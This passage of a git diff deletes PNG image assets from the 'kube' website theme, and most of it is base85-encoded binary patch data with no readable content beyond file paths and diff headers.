zsp*+{wo31J?^jaDOtDo8H}y5}EpSfF$n>ZxN)4{^3rViZPPR-@vbR&PsjvbXkegbP
zs8ErclUHn2VXFi-*9yo63F|8<fR&VF+bTgE72zA8;GAESs$i;TrkiYFX0Bjvsb^?v
zZf;_(qhMrUXsT~utZ!_fYh-L?Vqj%rqyPm<K--E^(yW49+@N*=dA3R!B_#z``ugSN
z<$C4Ddih1^`i7R4mih)p`bI{&Koz>hm3bwJ6}oxF$}kgLQj3#|G7CyF^YauyCMG83
zmzLNn0bL65LT&-v*t}wBFaZNhzap_f-%!s0<RzFwUtj!6b93RUi%Wu15$?rmaB)aw
zL8^XGYH@yPQ8F;%(v(3~6<9eJr6!i-7lq{K=fFZSAS1sdzc?emK*8A=9BK+0zKO}1
zc_2Yeur6O;E6=>*lEl2^R8JRMC7?NanVBh8P8N<97RFA7Ms7~VhK8<Yjs_;?PDbVy
zMrP(tCgz52FugAM$)&lec_lEtDG0qrIQ4=OL~a4lW|!2W%(B!Jx1#)91+d4hGI6@a
z(G910P`xR*-C}@KuRhQ*`k?4Vif)(?Fb#p2@Wcz`z>|M!9x%-p0TcIDFP+E0Jmc=^
z;uunK>q*po?+{0kd9xR3&)&Ul)9rmCA`&7ge;NNa7zuj6NLADjSfZ|d;={oM=KmQE
zPk;5FLy*fQcO$#5_l2@j?TI=~4zC;|x89cg<K}-mtNi=F8<JKZ42#mAo%#ND&P?m#
zbxsm_)7<O$g!CAea~|j5bh3R_FSJk4PVk=KF;3x%IK$P7OE}JRR5rybeR?swX}v?|
zeMKEZBk2~CM241GhRlfyjp>?OJQw%B+Rrk7ANNk5it}vqRPU%BIsHM@{eI*#|6h3@
zn=5n^Cw$;$J}bDcdP|$mk6F$6mdBKPUUr_0e<eC+y|CObldG4~<&SMJOuMu8^5PaA
znL3p@ya~N04eb)nR2~vE-~We6X0M_O^Bs*z5|`Q9D=aTta<Ut@WUy{~sUd6_nRSD2
zVe+|di;|uHiXIp}*%HiM*7UU@>E6j%5zNcA{kC~;&8RlD`t+qK_*wkz*S6o9R$cON
z5Iq-QX7O%k!SstOoDVmrv+vM-zjZ<WhS=km0vcHJ%y#@sJ-p)0wI4t3^Y$HX6&0Mr
z_f*h)*~SJ5i#(BivqNfnr3*NvAHV*>AUDt1GOM8>@LVLPMQhP92F85Lbkzqer+OHf
zHfhZMaX9oy=we1Dse@nH>sPER*~-STBC)32se{|_=%<*5S$$Q^9iL+^_cg57;Fnf#
zDExDdRY&ZNo7L=FwPHIODyN)f<FGhvsm&;?p)U!Pt~n`hCSX?B+mqpA$J96b!Jqct
z1nIYzA{@jm`b1XmX+5Rc%j(no_-xWt#Y0?DTe3X%iQchm&JKK?c>PpX?+I@`t&>+b
z#~&8B$GPbtb1%yZ`Le?O@$r$?Qm0cU`E}|_-;ueQ{7`A*tA!s~K2Hv^YKu5?(x!F?
z)04wV-*+F$R$myL!MV&%wqTo5n_;Z`!NQHRWzTgzuq#;czQD4eAl365)5PwV`~0JG
zOlwxNTI<^US)ug!z2@#yC%;~Nrufrr+q0Y=(ND=$w<A4PCLhlYyeB?K<CmXd{iW}r
z`;)i$<vf2Ke&ayVt$2Z7oYxCpTBvLj-X!)f&neda*1C=V;va0*JCW<>SE&BbGSPd=
zzx8a<FK)k7i`nC~_;k!!*F%+uJY#&NZ_KO}J@H6QRX-s4Row6R+xd)a41zj;`6D;}
Q^Z->hp00i_>zopr0N1adbN~PV

diff --git a/website/src/themes/kube/static/img/kube/icon-typo.png b/website/src/themes/kube/static/img/kube/icon-typo.png
deleted file mode 100644
index 083b5b41d850ab7496b5f3dd5b7dd0cbf4e0b3b5..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 1133
zcmaJ>TWHfz7>-kiZeBoSY8fL$8B^9IO}nOzi(A{Qu4qQ7bsLCimYl6&CMPCmHXDdz
zQ`84xh`xvqQ$c-EL_sD>RrWLxA4N71^uei!7i5Yc>PcOv57q<8Ip^p5zW<t>Om}Qw
zS>>xD2x4WbUCQ8{^`2#w_}x|U?Ks{xptf$b3-+SCVgn+k!5%=S45bfbfT9f^oC3`R
zvA99ccB5{2r=UWERy+*t8Wv^~M01O4DQZ7JWDn@mO_BO=_dZ4Hnn-mu$*gQ8Ku&KT
zvcayQj;uP=uSPYhWgFS-3Ru7ZNFiP0fawUXNELMjeD=%?MHV5bU!;Bq)h(yV1hfI!
zM2Gz<8|FzqN(Y*FKEyYY92;n2*dP;R{ajE8u|kL==NE;&*;=oVk&^Si@J*z02w4Kd
z<nwttAEcq(#{{C$D8q6L$N4eB?+ltqas8&Vv7{gYN40ee>ChxSMWqK0Ad$k6{!YQL
z7GzClzD&4ajH_5ofM&gvN<dluKh!W5&<@IgKk@!k*vSrBfXM&{4%jMgT<=EDl_ex>
zpde^xAv{p3Vmb#AbaK!l6NzHg$Oc(ab<;C$F0y1<NSO{&OckUgk-|E(u4_U(5{pEF
zF^NmYgMmO>IL3zfILAl0Fdq-`fn<p*L3O|YCMt2YKisymTyG!@3wxG;tseqf(uM|E
zOkB{*#}Y5AH_z3|$C4<^WpFTz*WSO{T{7Vr@{S9`i!Te~4@^AsHXiQCsuL9cFlJIx
zEbC6cJ1166vMY{VdU<Vhru9|L(9c`w?X$6JG<AJ?|2lO#{d37CcXeI;_;8^;>5D&V
z&OK4m^c+!tn4~@}pY_9VPuJ|Fv3vU-tEp;v<n&iz>&%+r{>X>IE#LPyk1Jblp8ruX
zanz~#I5+DXUjKb9apUOc&c)+}inohut`VK-r7y+WBOSM2@4Qks8l2euWl!Pxnfk)y
zmWNZdPr=y-Vejwo?=>F3{9^C>+8tM0FD%QC=a+_l+__k&fQu@L#<}PzpHl7jc&WAy
J>3V$s$S+F#Zzcc$

diff --git a/website/src/themes/kube/static/img/kube/typography/01.png b/website/src/themes/kube/static/img/kube/typography/01.png
deleted file mode 100644
index 3d06a7be37200785e5fb533f6f74dd27abb4a310..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 44318
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
